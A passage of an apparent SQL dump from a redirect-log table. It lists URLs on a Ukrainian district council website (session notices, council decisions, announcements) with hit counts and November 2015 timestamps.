00:00:00',301),(18533,'http://www.malyn-rayrada.org.ua/index.php/590-pro-sklikannja-24-sesii-rajonnoi-radi-6-sklikannja?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-13 22:09:44','0000-00-00 00:00:00',301),(18534,'http://www.malyn-rayrada.org.ua/index.php/875-ogoloshennya?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-13 22:09:53','0000-00-00 00:00:00',301),(18535,'http://www.malyn-rayrada.org.ua/index.php/933-vidbulas-35-sesiya-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-13 22:10:14','0000-00-00 00:00:00',301),(18536,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1208-pro-vnesennya-zmin-do-polozhennya-pro-postijni-komisiji-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-13 22:15:35','0000-00-00 00:00:00',301),(18537,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-/505-pro-spisannja-avtomobilja','','','',11,0,'2015-11-13 22:23:07','0000-00-00 00:00:00',301),(18538,'http://malyn-rayrada.org.ua/index.php/1218-16-zhovtnya-2015-roku-vidbudetsya-spilnij-seminar-navchannya-dlya-platnikiv-podatkiv','','','',8,0,'2015-11-13 22:23:07','0000-00-00 00:00:00',301),(18539,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-?start=5','','','',4,0,'2015-11-13 23:27:18','0000-00-00 00:00:00',301),(18540,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=51&layout=blog&Itemid=92&lang=uk&limitstart=10','','','',10,0,'2015-11-13 23:46:30','0000-00-00 00:00:00',301),(18541,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=523:2011-12-30-10-16-28&catid=38:--19122011-&Itemid=73&lang=uk','','','',8,0,'2015-11-13 23:53:26','0000-00-00 00:00:00',301),(18542,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=51&Itemid=92&lang=uk&limitstart=10','','','',1,0,'2015-11-14 00:13:52','0000-00-00 00:00:00',301),(18543,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&id=51:--19072013-&lang=en&layout=blog&limitstart=5&option=com_content&view=category','','','',1,0,'2015-11-14 00:16:27','0000-00-00 00:00:00',301),(18544,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=51:--19072013-&layout=blog&Itemid=92&lang=uk&limitstart=10','','','',2,0,'2015-11-14 00:27:34','0000-00-00 00:00:00',301),(18545,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/623-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_14','','','',9,0,'2015-11-14 01:06:38','0000-00-00 00:00:00',301),(18546,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=818:2012-11-14-16-37-52&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-14 01:41:04','0000-00-00 00:00:00',301),(18547,'http://www.malyn-rayrada.org.ua/index.php/1156-vikonannya-dokhidnoji-chastini-byudzhetiv-rajoniv-ta-mist-oblasti-za-pershe-pivrichchya-2015-roku','','','',28,0,'2015-11-14 02:02:13','0000-00-00 00:00:00',301),(18548,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&id=43:--25072012-&lang=en&layout=blog&limitstart=25&option=com_content&view=category','','','',2,0,'2015-11-14 03:12:18','0000-00-00 00:00:00',301),(18549,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/182-pro-hid-vikonannja-programi-zabezpechennja','','','',24,0,'2015-11-14 04:50:40','0000-00-00 00:00:00',301),(18550,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=834:-20-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2015-11-14 04:50:53','0000-00-00 00:00:00',301),(18551,'http://www.malyn-rayrada.org.ua/index.php?id=30&Itemid=61&lang=uk&layout=blog&option=com_content&view=category','','','',1,0,'2015-11-14 04:51:09','0000-00-00 00:00:00',301),(18552,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=627:2012-04-02-15-57-23&lang=ru&option=com_content&view=article','','','',5,0,'2015-11-14 04:59:17','0000-00-00 00:00:00',301),(18553,'http://www.malyn-rayrada.org.ua/index.php/385-rezultati-ekzit-poliv','','','',13,0,'2015-11-14 05:01:06','0000-00-00 00:00:00',301),(18554,'http://www.malyn-rayrada.org.ua/index.php/1115-vidbulas-40-pozachergova-sesiya-rajonnoji-radi','','','',75,0,'2015-11-14 05:11:28','0000-00-00 00:00:00',301),(18555,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=444:2011-10-24-07-04-45&catid=37:--21102011-&Itemid=72&lang=ru','','','',4,0,'2015-11-14 06:00:30','0000-00-00 00:00:00',301),(18556,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=324:2011-05-20-16-10-02&catid=33&Itemid=66&lang=uk','','','',6,0,'2015-11-14 06:57:03','0000-00-00 00:00:00',301),(18557,'http://malyn-rayrada.org.ua/index.php/1000-go-malinshchina-pidtrimaemo-zemlyakiv-dopomozhimo-jim-razom?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-14 07:29:29','0000-00-00 00:00:00',301),(18558,'http://malyn-rayrada.org.ua/index.php/1013-vidpovid-na-zvernennya-deputativ-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-14 07:29:40','0000-00-00 00:00:00',301),(18559,'http://malyn-rayrada.org.ua/index.php/1057-vidbulas-38-sesiya-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-14 07:29:45','0000-00-00 00:00:00',301),(18560,'http://malyn-rayrada.org.ua/index.php/1067-kp-akhplan-malinskoji-rajonnoji-radi-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu','','','',4,0,'2015-11-14 07:29:46','0000-00-00 00:00:00',301),(18561,'http://malyn-rayrada.org.ua/index.php/1092-ogoloshennya-malinskoji-rajonnoji-blagodijnoji-organizatsiji-zakhist-ditej-chornobilya-shchodo-vidpochinku','','','',3,0,'2015-11-14 07:29:48','0000-00-00 00:00:00',301),(18562,'http://malyn-rayrada.org.ua/index.php/1181-pro-sklikannya-42-sesiji-rajonnoji-radi-6-sklikannya','','','',4,0,'2015-11-14 07:29:49','0000-00-00 00:00:00',301),(18563,'http://malyn-rayrada.org.ua/index.php/1185-problemu-potribno-virishuvati-spilno?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-14 07:29:51','0000-00-00 00:00:00',301),(18564,'http://malyn-rayrada.org.ua/index.php/1197-znyato-z-poryadku-dennogo-shche-odnu-problemu-likarni','','','',5,0,'2015-11-14 07:29:52','0000-00-00 00:00:00',301),(18565,'http://malyn-rayrada.org.ua/index.php/1211-vitaemo-z-dnem-vchitelya?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-14 07:29:54','0000-00-00 00:00:00',301),(18566,'http://malyn-rayrada.org.ua/index.php/1212-viddil-statistiki-u-malinskomu-rajoni-informue','','','',4,0,'2015-11-14 07:29:55','0000-00-00 00:00:00',301),(18567,'http://malyn-rayrada.org.ua/index.php/1214-naperedodni-mistsevikh-viboriv-malinskij-mrv-usbu-v-zhitomirskij-oblasti-nagadue-telefon-doviri','','','',10,0,'2015-11-14 07:29:57','0000-00-00 00:00:00',301),(18568,'http://malyn-rayrada.org.ua/index.php/187-ogoloshennja','','','',3,0,'2015-11-14 07:30:00','0000-00-00 00:00:00',301),(18569,'http://malyn-rayrada.org.ua/index.php/20-vidbulos-zasidannja-koordinacijnoi-radi-z-pitan','','','',3,0,'2015-11-14 07:30:01','0000-00-00 00:00:00',301),(18570,'http://www.malyn-rayrada.org.ua/index.php?id=56&Itemid=97&lang=uk&layout=blog&option=com_content&view=category','','','',5,0,'2015-11-14 07:31:29','0000-00-00 00:00:00',301),(18571,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=775:2012-10-02-09-35-53&Itemid=84&lang=uk&option=com_content&view=article','','','',1,0,'2015-11-14 07:31:49','0000-00-00 00:00:00',301),(18572,'http://malyn-rayrada.org.ua/index.php/244-ekzotiki-za-rahunok-bjudzhetu-ne-bude','','','',3,0,'2015-11-14 07:32:57','0000-00-00 00:00:00',301),(18573,'http://malyn-rayrada.org.ua/index.php/259-vidznacheno-deputata-malinskoi-rajonnoi-radi','','','',3,0,'2015-11-14 07:32:59','0000-00-00 00:00:00',301),(18574,'http://malyn-rayrada.org.ua/index.php/264-6-ljutogo-2012-roku-vipadkove-foto?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-14 07:33:00','0000-00-00 00:00:00',301),(18575,'http://malyn-rayrada.org.ua/index.php/454-vitaemo','','','',5,0,'2015-11-14 07:33:13','0000-00-00 00:00:00',301),(18576,'http://malyn-rayrada.org.ua/index.php/464-malinskij-ditjachij-shkoli-mistectv-50?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-14 07:33:15','0000-00-00 00:00:00',301),(18577,'http://malyn-rayrada.org.ua/index.php/516-zaversheno-pidgotovku-do-provedennja-20-sesii','','','',3,0,'2015-11-14 07:33:18','0000-00-00 00:00:00',301),(18578,'http://malyn-rayrada.org.ua/index.php/52-vitaemo-iz-pershim-dnem-vesni','','','',5,0,'2015-11-14 07:33:19','0000-00-00 00:00:00',301),(18579,'http://malyn-rayrada.org.ua/index.php/523-vidbulas-21-pozachergova-sesija-rajonnoi-radi','','','',4,0,'2015-11-14 07:33:20','0000-00-00 00:00:00',301),(18580,'http://malyn-rayrada.org.ua/index.php/539-malinska-rajonna-rada-shhiro-vitae-vas-iz-dnem','','','',3,0,'2015-11-14 07:33:22','0000-00-00 00:00:00',301),(18581,'http://malyn-rayrada.org.ua/index.php/540-malinchani-budte-oberezhnimi-pid-chas-moroziv-i_2','','','',3,0,'2015-11-14 07:33:24','0000-00-00 00:00:00',301),(18582,'http://malyn-rayrada.org.ua/index.php/562-upravlinnja-statistiki-informue','','','',3,0,'2015-11-14 07:33:25','0000-00-00 00:00:00',301),(18583,'http://malyn-rayrada.org.ua/index.php/613-upravlinnja-statistiki-informue_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-14 07:33:26','0000-00-00 00:00:00',301),(18584,'http://malyn-rayrada.org.ua/index.php/614-osvoennja-novoi-profesii-abo-pidvishhennja','','','',3,0,'2015-11-14 07:33:28','0000-00-00 00:00:00',301),(18585,'http://malyn-rayrada.org.ua/index.php/616-narodnij-deputat-ukraini-zhuravskij-trimae-slovo?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-14 07:33:29','0000-00-00 00:00:00',301),(18586,'http://malyn-rayrada.org.ua/index.php/617-shkoli-buti','','','',3,0,'2015-11-14 07:33:31','0000-00-00 00:00:00',301),(18587,'http://malyn-rayrada.org.ua/index.php/619-do-vidoma-pidpriemciv-ta-zhiteliv-kabmin-vstanoviv','','','',3,0,'2015-11-14 07:33:32','0000-00-00 00:00:00',301),(18588,'http://malyn-rayrada.org.ua/index.php/620-z-svjatom-osvitjani?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-14 07:33:34','0000-00-00 00:00:00',301),(18589,'http://www.malyn-rayrada.org.ua/index.php/1204-vidbulas-42-sesiya-rajonnoji-radi','','','',28,0,'2015-11-14 07:49:45','0000-00-00 00:00:00',301),(18590,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1008:2013-05-20-07-02-57&lang=ru&option=com_content&view=article','','','',1,0,'2015-11-14 08:08:18','0000-00-00 00:00:00',301),(18591,'http://www.malyn-rayrada.org.ua/index.php/1186-q?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-14 08:53:38','0000-00-00 00:00:00',301),(18592,'http://www.malyn-rayrada.org.ua/index.php/1191-dopomozheno-dityam-razom','','','',32,0,'2015-11-14 08:53:40','0000-00-00 00:00:00',301),(18593,'http://www.malyn-rayrada.org.ua/index.php/1192-u-chajki-bronza-v-urozhayu-novij-stadion','','','',17,0,'2015-11-14 08:53:43','0000-00-00 00:00:00',301),(18594,'http://www.malyn-rayrada.org.ua/index.php/1197-znyato-z-poryadku-dennogo-shche-odnu-problemu-likarni?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-14 08:53:54','0000-00-00 00:00:00',301),(18595,'http://www.malyn-rayrada.org.ua/index.php/1204-vidbulas-42-sesiya-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-11-14 08:53:59','0000-00-00 00:00:00',301),(18596,'http://www.malyn-rayrada.org.ua/index.php/1206-ogoloshennya-pro-namiri','','','',25,0,'2015-11-14 08:54:02','0000-00-00 00:00:00',301),(18597,'http://www.malyn-rayrada.org.ua/index.php/1206-ogoloshennya-pro-namiri?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-14 08:54:04','0000-00-00 00:00:00',301),(18599,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&id=46&lang=uk&layout=blog&limitstart=15&option=com_content&view=category','','','',1,0,'2015-11-14 09:48:11','0000-00-00 00:00:00',301),(18602,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=717:2012-06-14-15-22-29&catid=43&Itemid=82&lang=uk','','','',6,0,'2015-11-14 11:16:07','0000-00-00 00:00:00',301),(18603,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=775:2012-10-02-09-35-53&catid=45&Itemid=84&lang=uk','','','',6,0,'2015-11-14 11:21:24','0000-00-00 00:00:00',301),(18605,'http://www.malyn-rayrada.org.ua/index.php/720-do-vidoma-pensioneriv','','','',17,0,'2015-11-14 11:48:52','0000-00-00 00:00:00',301),(18606,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/214-pro-zvit-golovi-rajonnoi-derzhavnoi-administracii?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-14 11:56:14','0000-00-00 00:00:00',301),(18607,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/240-pro-programu-socialno-ekonomichnogo-rozvitku_2','','','',8,0,'2015-11-14 11:57:29','0000-00-00 00:00:00',301),(18608,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/802-pro-peredachu-avtomobilja-gaz-3110_2','','','',24,0,'2015-11-14 11:58:25','0000-00-00 00:00:00',301),(18609,'http://www.malyn-rayrada.org.ua/index.php/1082-pro-sklikannya-39-sesiji-rajonnoji-radi-6-sklikannya','','','',23,0,'2015-11-14 12:20:13','0000-00-00 00:00:00',301),(18610,'http://www.malyn-rayrada.org.ua/index.php/1108-pro-sklikannya-40-pozachergovoji-sesiji-rajonnoji-radi-6-sklikannya','','','',17,0,'2015-11-14 12:21:15','0000-00-00 00:00:00',301),(18611,'http://www.malyn-rayrada.org.ua/index.php/1126-viddil-statistiki-u-malinskomu-rajoni-informue-pro-cotsialno-ekonomichne-stanovishche-malinskogo-rajonu-za-sichen-traven-2015-roku','','','',25,0,'2015-11-14 12:21:56','0000-00-00 00:00:00',301),(18612,'http://www.malyn-rayrada.org.ua/index.php/281-vidbulas-11-sesija-rajonnoi-radi-6-sklikannja','','','',16,0,'2015-11-14 12:43:19','0000-00-00 00:00:00',301),(18613,'http://www.malyn-rayrada.org.ua/index.php/664-ogoloshennja_11?tmpl=component&print=1&layout=default&page=','','','',11,0,'2015-11-14 12:45:30','0000-00-00 00:00:00',301),(18614,'http://www.malyn-rayrada.org.ua/index.php/670-7-grudnja-den-miscevogo-samovrjaduvannja?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-14 12:45:33','0000-00-00 00:00:00',301),(18615,'http://www.malyn-rayrada.org.ua/index.php/671-do-dnja-miscevogo-samovrjaduvannja','','','',21,0,'2015-11-14 12:45:46','0000-00-00 00:00:00',301),(18616,'http://www.malyn-rayrada.org.ua/index.php/671-do-dnja-miscevogo-samovrjaduvannja?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-14 12:45:50','0000-00-00 00:00:00',301),(18617,'http://www.malyn-rayrada.org.ua/index.php/672-upravlinnja-statistiki-informue_4','','','',10,0,'2015-11-14 12:45:52','0000-00-00 00:00:00',301),(18618,'http://www.malyn-rayrada.org.ua/index.php/672-upravlinnja-statistiki-informue_4?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-14 12:45:54','0000-00-00 00:00:00',301),(18619,'http://www.malyn-rayrada.org.ua/index.php/673-informacija-pro-vikonannja-dohidnoi-chastini_2','','','',13,0,'2015-11-14 12:45:56','0000-00-00 00:00:00',301),(18620,'http://www.malyn-rayrada.org.ua/index.php/673-informacija-pro-vikonannja-dohidnoi-chastini_2?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-14 12:45:58','0000-00-00 00:00:00',301),(18621,'http://www.malyn-rayrada.org.ua/index.php/684-vitaemo-iz-svjatom-svjatogo-mikolaja?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-14 12:46:10','0000-00-00 00:00:00',301),(18622,'http://www.malyn-rayrada.org.ua/index.php/701-vidbulas-viizna-koordinacijna-rada-v-ljubovichah?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-14 12:47:24','0000-00-00 00:00:00',301),(18623,'http://www.malyn-rayrada.org.ua/index.php/704-malinskij-rajon-iz-bjudzhetom-na-2014-rik?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-14 12:47:31','0000-00-00 00:00:00',301),(18624,'http://www.malyn-rayrada.org.ua/index.php/705-korotko-pro-finansi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-14 12:47:51','0000-00-00 00:00:00',301),(18625,'http://www.malyn-rayrada.org.ua/index.php/706-do-vidoma-deputativ-miscevih-rad?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-14 12:48:07','0000-00-00 00:00:00',301),(18626,'http://www.malyn-rayrada.org.ua/index.php/707-ogoloshennja_12?tmpl=component&print=1&layout=default&page=','','','',8,0,'2015-11-14 12:48:22','0000-00-00 00:00:00',301),(18627,'http://www.malyn-rayrada.org.ua/index.php/71-novo-vorob’ivskij-znvkshkola-sad-i-iii-stupeniv','','','',87,0,'2015-11-14 12:48:27','0000-00-00 00:00:00',301),(18628,'http://www.malyn-rayrada.org.ua/index.php/71-novo-vorob’ivskij-znvkshkola-sad-i-iii-stupeniv?tmpl=component&print=1&layout=default&page=','','','',50,0,'2015-11-14 12:48:32','0000-00-00 00:00:00',301),(18629,'http://www.malyn-rayrada.org.ua/index.php/711-vidbulosja-pidpisannja-ugodi-pro-vreguljuvannja','','','',18,0,'2015-11-14 12:48:43','0000-00-00 00:00:00',301),(18630,'http://www.malyn-rayrada.org.ua/index.php/711-vidbulosja-pidpisannja-ugodi-pro-vreguljuvannja?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-14 12:48:46','0000-00-00 00:00:00',301),(18631,'http://www.malyn-rayrada.org.ua/index.php/712-verhovna-rada-povernula-konstituciju-2004-roku','','','',33,0,'2015-11-14 12:48:50','0000-00-00 00:00:00',301),(18632,'http://www.malyn-rayrada.org.ua/index.php/723-pro-nevidkladni-zahodi-shhodo-zabezpechennja','','','',16,0,'2015-11-14 12:49:17','0000-00-00 00:00:00',301),(18633,'http://www.malyn-rayrada.org.ua/index.php/723-pro-nevidkladni-zahodi-shhodo-zabezpechennja?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-14 12:49:57','0000-00-00 00:00:00',301),(18634,'http://www.malyn-rayrada.org.ua/index.php/760-ogoloshennja_15?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-14 12:51:15','0000-00-00 00:00:00',301),(18635,'http://www.malyn-rayrada.org.ua/index.php/771-golova-oda-kizin-s-v-predstaviv-aktivu-rajonu-ta?tmpl=component&print=1&layout=default&page=','','','',7,0,'2015-11-14 12:51:34','0000-00-00 00:00:00',301),(18636,'http://www.malyn-rayrada.org.ua/index.php/775-pro-sklikannja-30-sesii-rajonnoi-radi-6-sklikannja?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-14 12:52:24','0000-00-00 00:00:00',301),(18637,'http://www.malyn-rayrada.org.ua/index.php/794-vidbulas-30-sesija-malinskoi-rajonnoi-radi','','','',11,0,'2015-11-14 12:53:30','0000-00-00 00:00:00',301),(18638,'http://www.malyn-rayrada.org.ua/index.php/797-vidbulas-koordinacijna-rada-pri-golovi-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-14 12:53:38','0000-00-00 00:00:00',301),(18639,'http://www.malyn-rayrada.org.ua/index.php/816-golovne-upravlinnja-derzhzemagentstva-u?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-14 12:55:19','0000-00-00 00:00:00',301),(18640,'http://www.malyn-rayrada.org.ua/index.php/818-informacija-pro-rezultati-konkursu-shhodo-vidboru?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-14 12:55:21','0000-00-00 00:00:00',301),(18641,'http://www.malyn-rayrada.org.ua/index.php/820-blagodijna-organizacija-„likarnjana-kasa?tmpl=component&print=1&layout=default&page=','','','',48,0,'2015-11-14 12:55:41','0000-00-00 00:00:00',301),(18642,'http://www.malyn-rayrada.org.ua/index.php/821-vidbuvsja-viiznij-seminar?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-14 12:55:45','0000-00-00 00:00:00',301),(18643,'http://www.malyn-rayrada.org.ua/index.php/832-vidbulas-31-sesija-malinskoi-rajonnoi-radi','','','',9,0,'2015-11-14 12:56:11','0000-00-00 00:00:00',301),(18644,'http://www.malyn-rayrada.org.ua/index.php/835-malinskij-rajonnij-centr-socialnih-sluzhb-dlja?tmpl=component&print=1&layout=default&page=','','','',5,0,'2015-11-14 12:56:29','0000-00-00 00:00:00',301),(18645,'http://www.malyn-rayrada.org.ua/index.php/843-vistup-prezidenta-na-paradi-na-chest-23-i-richnici?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-14 12:57:29','0000-00-00 00:00:00',301),(18646,'http://www.malyn-rayrada.org.ua/index.php/874-vidbulas-33-pozachergova-sesiya-rajonnoji-radi','','','',20,0,'2015-11-14 13:09:10','0000-00-00 00:00:00',301),(18647,'http://www.malyn-rayrada.org.ua/index.php/874-vidbulas-33-pozachergova-sesiya-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2015-11-14 13:09:12','0000-00-00 00:00:00',301),(18648,'http://www.malyn-rayrada.org.ua/index.php/967-vidbulas-36-sesiya-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-14 13:11:45','0000-00-00 00:00:00',301),(18649,'http://www.malyn-rayrada.org.ua/index.php/973-viplata-pensij-osobam-yaki-peremishchuyutsya-z-timchasovo-okupovanoji-teritoriji-ukrajini-abo-rajoniv-provedennya-antiteroristichnoji-operatsiji?tmpl=component&print=1&layout=default&page=','','','',3,0,'2015-11-14 13:11:54','0000-00-00 00:00:00',301),(18650,'http://www.malyn-rayrada.org.ua/index.php/987-viplata-pensij-osobam-yaki-peremishchuyutsya-z-timchasovo-okupovanoji-teritoriji-ukrajini-abo-rajoniv-provedennya-ato?tmpl=component&print=1&layout=default&page=','','','',6,0,'2015-11-14 13:12:14','0000-00-00 00:00:00',301),(18651,'http://www.malyn-rayrada.org.ua/index.php/835-malinskij-rajonnij-centr-socialnih-sluzhb-dlja','','','',19,0,'2015-11-14 13:27:36','0000-00-00 00:00:00',301),(18652,'http://malyn-rayrada.org.ua/index.php/583-rosijska-mitnicja-z-sogodnishnogo-dnja-zupinila','','','',8,0,'2015-11-14 13:29:48','0000-00-00 00:00:00',301),(18653,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=642:2012-04-03-12-53-05&catid=32:2011-03-31-12-03-04&Itemid=64&lang=uk','','','',5,0,'2015-11-14 14:01:44','0000-00-00 00:00:00',301),(18654,'http://www.malyn-rayrada.org.ua/attachments/477_додаток 1_Дефектний акт.pdf','','','',17,0,'2015-11-14 14:31:24','0000-00-00 00:00:00',301),(18655,'http://malyn-rayrada.org.ua/index.php/391-pershi-oficijni-rezultati-viboriv_2','','','',54,0,'2015-11-14 15:35:14','0000-00-00 00:00:00',301),(18656,'http://malyn-rayrada.org.ua/index.php/973-viplata-pensij-osobam-yaki-peremishchuyutsya-z-timchasovo-okupovanoji-teritoriji-ukrajini-abo-rajoniv-provedennya-antiteroristichnoji-operatsiji','','','',4,0,'2015-11-14 15:35:19','0000-00-00 00:00:00',301),(18657,'http://www.malyn-rayrada.org.ua/index.php?Itemid=77&catid=40:--28032012-&id=594:-lr-&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-14 16:09:52','0000-00-00 00:00:00',301),(18658,'http://www.malyn-rayrada.org.ua/index.php?lang=en&option=com_phocagallery&view=categories','','http://go.mail.ru/search_images','',4,0,'2015-11-14 16:29:26','0000-00-00 00:00:00',301),(18660,'http://www.malyn-rayrada.org.ua/index.php/797-vidbulas-koordinacijna-rada-pri-golovi-rajonnoi','','','',13,0,'2015-11-14 19:00:08','0000-00-00 00:00:00',301),(18661,'http://www.malyn-rayrada.org.ua/index.php/684-vitaemo-iz-svjatom-svjatogo-mikolaja','','','',103,0,'2015-11-14 19:03:28','0000-00-00 00:00:00',301),(18663,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=503:-2017-&catid=38&Itemid=73&lang=ru','','','',6,0,'2015-11-14 20:17:25','0000-00-00 00:00:00',301),(18664,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=721:-lr&lang=uk&option=com_content&view=article','','','',2,0,'2015-11-14 22:20:07','0000-00-00 00:00:00',301),(18665,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1109-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-po-viznachennyu-normativnoji-groshovoji-otsinki-zemelnikh-dilyanok-yaki-nadayutsya-v-orendu-gr-yakimenko-n-m','','','',8,0,'2015-11-14 22:36:10','0000-00-00 00:00:00',301),(18666,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=32&Itemid=64&lang=en','','','',17,0,'2015-11-14 23:00:52','0000-00-00 00:00:00',301),(18667,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=328:2011-05-20-16-23-02&catid=33&Itemid=66&lang=uk','','','',10,0,'2015-11-14 23:39:17','0000-00-00 00:00:00',301),(18669,'http://malyn-rayrada.org.ua/index.php/68-pro-provedennja-rajonnogo-konkursu-sered-silskih-i','','','',4,0,'2015-11-15 01:25:35','0000-00-00 00:00:00',301),(18670,'http://malyn-rayrada.org.ua/index.php/71-novo-vorob’ivskij-znvkshkola-sad-i-iii-stupeniv','','','',92,0,'2015-11-15 01:25:39','0000-00-00 00:00:00',301),(18671,'http://malyn-rayrada.org.ua/index.php/71-novo-vorob’ivskij-znvkshkola-sad-i-iii-stupeniv?tmpl=component&print=1&layout=default&page=','','','',93,0,'2015-11-15 01:25:41','0000-00-00 00:00:00',301),(18672,'http://malyn-rayrada.org.ua/index.php/818-informacija-pro-rezultati-konkursu-shhodo-vidboru','','','',14,0,'2015-11-15 01:25:46','0000-00-00 00:00:00',301),(18673,'http://malyn-rayrada.org.ua/index.php/821-vidbuvsja-viiznij-seminar','','','',9,0,'2015-11-15 01:25:55','0000-00-00 00:00:00',301),(18674,'http://www.malyn-rayrada.org.ua/index.php/386-pershi-oficijni-rezultati-viboriv','','','',9,0,'2015-11-15 01:26:18','0000-00-00 00:00:00',301),(18675,'http://www.malyn-rayrada.org.ua/index.php/439-do-vidoma-sub-ektiv-pidpriemnickoi-dijalnosti','','','',13,0,'2015-11-15 01:26:25','0000-00-00 00:00:00',301),(18676,'http://www.malyn-rayrada.org.ua/index.php/48-zustrich-iz-vchiteljami','','','',20,0,'2015-11-15 01:26:35','0000-00-00 00:00:00',301),(18677,'http://www.malyn-rayrada.org.ua/index.php/52-vitaemo-iz-pershim-dnem-vesni','','','',17,0,'2015-11-15 01:26:39','0000-00-00 00:00:00',301),(18678,'http://www.malyn-rayrada.org.ua/index.php/540-malinchani-budte-oberezhnimi-pid-chas-moroziv-i_2','','','',10,0,'2015-11-15 01:26:45','0000-00-00 00:00:00',301),(18679,'http://www.malyn-rayrada.org.ua/index.php/554-rekonstrukcii-stadionu-avangard-buti','','','',24,0,'2015-11-15 01:26:48','0000-00-00 00:00:00',301),(18680,'http://www.malyn-rayrada.org.ua/index.php/582-jak-vberegtisja-vid-speki-poradi-mns','','','',22,0,'2015-11-15 01:26:58','0000-00-00 00:00:00',301),(18681,'http://www.malyn-rayrada.org.ua/index.php/619-do-vidoma-pidpriemciv-ta-zhiteliv-kabmin-vstanoviv','','','',13,0,'2015-11-15 01:27:26','0000-00-00 00:00:00',301),(18682,'http://www.malyn-rayrada.org.ua/index.php/83-deputati-radilis-shhodo-situacii-v-kp-trs-polissja','','','',66,0,'2015-11-15 01:28:05','0000-00-00 00:00:00',301),(18683,'http://www.malyn-rayrada.org.ua/index.php/86-14-zhovtnja-den-ukrainskogo-kozactva','','','',40,0,'2015-11-15 01:28:13','0000-00-00 00:00:00',301),(18684,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=679:2012-05-17-10-00-53&catid=42:--16052012-&Itemid=80&lang=uk','','','',7,0,'2015-11-15 03:51:30','0000-00-00 00:00:00',301),(18685,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=451:-2011-2015-&catid=38:--19122011-&Itemid=73&lang=uk','','','',5,0,'2015-11-15 05:13:59','0000-00-00 